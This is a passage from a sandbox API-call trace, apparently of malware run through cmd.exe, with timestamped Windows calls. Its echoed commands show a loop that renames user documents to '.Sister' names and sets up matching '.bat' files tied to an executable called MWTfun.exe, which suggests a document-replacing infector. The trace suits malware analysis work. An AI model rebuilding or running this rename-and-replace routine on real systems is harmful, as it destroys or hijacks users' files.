lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x1a) returned 1 [0305.630] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.630] GetFileType (hFile=0x50) returned 0x2 [0305.630] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.630] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0305.630] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.631] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d34fa0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d34fa0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0305.631] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0305.631] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.631] GetFileType (hFile=0x50) returned 0x2 [0305.631] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.631] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0305.632] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.632] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0305.637] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0305.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.637] GetFileType (hFile=0x50) returned 0x2 [0305.637] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.637] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0305.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.637] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0305.644] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0305.645] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0305.645] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0305.645] malloc (_Size=0xffce) returned 0x21eda2bfc80 [0305.645] ??_V@YAXPEAX@Z () returned 0x21eda2bfc80 [0305.645] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0305.645] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0305.645] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0305.645] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0305.645] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0305.645] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0305.645] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0305.645] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0305.645] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0305.646] ??_V@YAXPEAX@Z () returned 0x1 [0305.646] GetProcessHeap () returned 0x21ed8c70000 [0305.646] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5fe40 [0305.646] GetProcessHeap () returned 0x21ed8c70000 [0305.646] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5fe40, Size=0x130) returned 0x21ed8d2d450 [0305.646] GetProcessHeap () returned 0x21ed8c70000 [0305.646] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2d450) returned 0x130 [0305.646] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0305.646] malloc (_Size=0xffce) returned 0x21eda2bfc80 [0305.646] ??_V@YAXPEAX@Z () returned 0x21eda2bfc80 [0305.646] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0305.646] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21eda2bfc80, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0305.648] ??_V@YAXPEAX@Z () returned 0x1 [0305.648] GetProcessHeap () returned 0x21ed8c70000 [0305.648] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d2d590 [0305.648] GetProcessHeap () returned 0x21ed8c70000 [0305.648] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f4c0 [0305.648] GetProcessHeap () returned 0x21ed8c70000 [0305.648] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f4c0, Size=0x130) returned 0x21ed8d2e210 [0305.648] GetProcessHeap () returned 0x21ed8c70000 [0305.648] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2e210) returned 0x130 [0305.648] malloc (_Size=0xffce) returned 0x21eda2bfc80 [0305.648] ??_V@YAXPEAX@Z () returned 0x21eda2bfc80 [0305.648] GetProcessHeap () returned 0x21ed8c70000 [0305.649] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7180 [0305.649] GetProcessHeap () returned 0x21ed8c70000 [0305.649] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9372950 [0305.649] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0305.649] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0305.649] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0305.650] GetLastError () returned 0x2 [0305.650] GetProcessHeap () returned 0x21ed8c70000 [0305.650] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93e6b80 [0305.650] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed93e6b90 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.650] SetErrorMode (uMode=0x0) returned 0x0 [0305.650] SetErrorMode (uMode=0x1) returned 0x0 [0305.650] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21eda2bfc80, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0305.650] SetErrorMode (uMode=0x0) returned 0x1 [0305.650] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0305.650] GetProcessHeap () returned 0x21ed8c70000 [0305.650] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9373a60 [0305.651] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0305.651] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0305.651] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0305.651] GetLastError () returned 0x2 [0305.651] ??_V@YAXPEAX@Z () returned 0x1 [0305.651] malloc (_Size=0xffce) returned 0x21eda2bfc80 [0305.651] ??_V@YAXPEAX@Z () returned 0x21eda2bfc80 [0305.651] malloc (_Size=0xffce) returned 0x21eda2cfc60 [0305.651] ??_V@YAXPEAX@Z () returned 0x21eda2cfc60 [0305.651] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0305.651] GetLastError () returned 0x2 [0305.651] _get_osfhandle (_FileHandle=2) returned 0x54 [0305.651] GetFileType (hFile=0x54) returned 0x2 [0305.651] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0305.651] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0305.659] _get_osfhandle (_FileHandle=2) returned 0x54 [0305.659] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0305.660] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0305.660] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0305.660] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0305.666] longjmp () [0305.666] ??_V@YAXPEAX@Z () returned 0x1 [0305.666] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52ad43f0, ftCreationTime.dwHighDateTime=0x1d59230, ftLastAccessTime.dwLowDateTime=0xb0468040, ftLastAccessTime.dwHighDateTime=0x1d57de9, ftLastWriteTime.dwLowDateTime=0xb0468040, ftLastWriteTime.dwHighDateTime=0x1d57de9, nFileSizeHigh=0x0, nFileSizeLow=0xbc5d, dwReserved0=0xa0000003, dwReserved1=0xe68ac9ea, cFileName="r49w_wkpLclkM.docx", cAlternateFileName="")) returned 1 [0305.667] GetProcessHeap () returned 0x21ed8c70000 [0305.667] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c758a0, Size=0x238) returned 0x21ed8c758a0 [0305.667] GetProcessHeap () returned 0x21ed8c70000 [0305.667] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c758a0) returned 0x238 [0305.667] GetProcessHeap () returned 0x21ed8c70000 [0305.667] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d35470 [0305.667] GetProcessHeap () returned 0x21ed8c70000 [0305.667] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d35470, Size=0x30) returned 0x21ed8d35470 [0305.667] GetProcessHeap () returned 0x21ed8c70000 [0305.667] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d35470) returned 0x30 [0305.667] GetProcessHeap () returned 0x21ed8c70000 [0305.667] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d354b0 [0305.667] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.668] GetProcessHeap () returned 0x21ed8c70000 [0305.668] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8cc8650 [0305.668] ??_V@YAXPEAX@Z () returned 0x1 [0305.668] GetProcessHeap () returned 0x21ed8c70000 [0305.668] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d354b0, Size=0x1a0) returned 0x21ed8d354b0 [0305.668] GetProcessHeap () returned 0x21ed8c70000 [0305.668] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d354b0) returned 0x1a0 [0305.668] GetProcessHeap () returned 0x21ed8c70000 [0305.668] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d35660 [0305.668] GetProcessHeap () returned 0x21ed8c70000 [0305.668] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d35660, Size=0x290) returned 0x21ed8d35660 [0305.668] GetProcessHeap () returned 0x21ed8c70000 [0305.668] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d35660) returned 0x290 [0305.668] GetProcessHeap () returned 0x21ed8c70000 [0305.668] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d35900 [0305.668] GetProcessHeap () returned 0x21ed8c70000 [0305.668] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d35900, Size=0x30) returned 0x21ed8d35900 [0305.668] GetProcessHeap () returned 0x21ed8c70000 [0305.668] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d35900) returned 0x30 [0305.668] GetProcessHeap () returned 0x21ed8c70000 [0305.668] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d35940 [0305.668] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.669] GetProcessHeap () returned 0x21ed8c70000 [0305.669] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8cc8990 [0305.669] ??_V@YAXPEAX@Z () returned 0x1 [0305.669] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.669] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc71e0 [0305.669] FindClose (in: hFindFile=0x21ed8cc71e0 | out: hFindFile=0x21ed8cc71e0) returned 1 [0305.669] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc71e0 [0305.670] FindClose (in: hFindFile=0x21ed8cc71e0 | out: hFindFile=0x21ed8cc71e0) returned 1 [0305.670] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe0c4640f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xe0c4640f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8cc71e0 [0305.670] FindClose (in: hFindFile=0x21ed8cc71e0 | out: hFindFile=0x21ed8cc71e0) returned 1 [0305.670] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0305.670] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\r49w_wkpLclkM.docx", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52ad43f0, ftCreationTime.dwHighDateTime=0x1d59230, ftLastAccessTime.dwLowDateTime=0xb0468040, ftLastAccessTime.dwHighDateTime=0x1d57de9, ftLastWriteTime.dwLowDateTime=0xb0468040, ftLastWriteTime.dwHighDateTime=0x1d57de9, nFileSizeHigh=0x0, nFileSizeLow=0xbc5d, dwReserved0=0x4, dwReserved1=0x7, cFileName="r49w_wkpLclkM.docx", cAlternateFileName="R49W_W~1.DOC")) returned 0x21ed8cc71e0 [0305.670] FindClose (in: hFindFile=0x21ed8cc71e0 | out: hFindFile=0x21ed8cc71e0) returned 1 [0305.670] _wcsnicmp (_String1="R49W_W~1.DOC", _String2="r49w_wkpLclkM.docx", _MaxCount=0x12) returned 19 [0305.670] malloc (_Size=0x1ff9c) returned 0x21eda2dfc40 [0305.672] ??_V@YAXPEAX@Z () returned 0x21eda2dfc40 [0305.673] GetProcessHeap () returned 0x21ed8c70000 [0305.673] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2c) returned 0x21ed8cc8850 [0305.673] ??_V@YAXPEAX@Z () returned 0x1 [0305.673] ??_V@YAXPEAX@Z () returned 0x1 [0305.673] GetProcessHeap () returned 0x21ed8c70000 [0305.673] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d35940, Size=0x198) returned 0x21ed8d35940 [0305.673] GetProcessHeap () returned 0x21ed8c70000 [0305.673] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d35940) returned 0x198 [0305.673] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0305.673] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.673] GetFileType (hFile=0x50) returned 0x2 [0305.674] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.674] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0305.674] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.674] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0305.679] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.679] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0305.679] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0305.679] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.679] GetFileType (hFile=0x50) returned 0x2 [0305.679] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.679] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0305.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.682] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0305.682] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.682] GetFileType (hFile=0x50) returned 0x2 [0305.682] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.683] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0305.683] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.683] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d35480*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d35480*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0305.684] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"r49w_wkpLclkM.docx\" \"r49w_wkpLclkM.docx.Sister\" ") returned 50 [0305.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.684] GetFileType (hFile=0x50) returned 0x2 [0305.684] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.684] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.684] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.684] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x32, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x32) returned 1 [0305.685] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0305.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.685] GetFileType (hFile=0x50) returned 0x2 [0305.686] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.686] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0305.686] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.686] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0305.687] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0305.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.687] GetFileType (hFile=0x50) returned 0x2 [0305.687] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.687] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.687] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.687] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0305.688] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0305.688] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.688] GetFileType (hFile=0x50) returned 0x2 [0305.688] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.688] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.689] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0305.689] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0305.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.689] GetFileType (hFile=0x50) returned 0x2 [0305.689] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.690] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.690] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0305.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.698] GetFileType (hFile=0x50) returned 0x2 [0305.698] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.698] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0305.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.699] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d35910*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d35910*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0305.699] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"r49w_wkpLclkM.docx.Sister\" \"r49w_wkpLclkM.bat\" ") returned 49 [0305.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.699] GetFileType (hFile=0x50) returned 0x2 [0305.699] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.699] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.700] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x31) returned 1 [0305.700] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0305.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.700] GetFileType (hFile=0x50) returned 0x2 [0305.700] 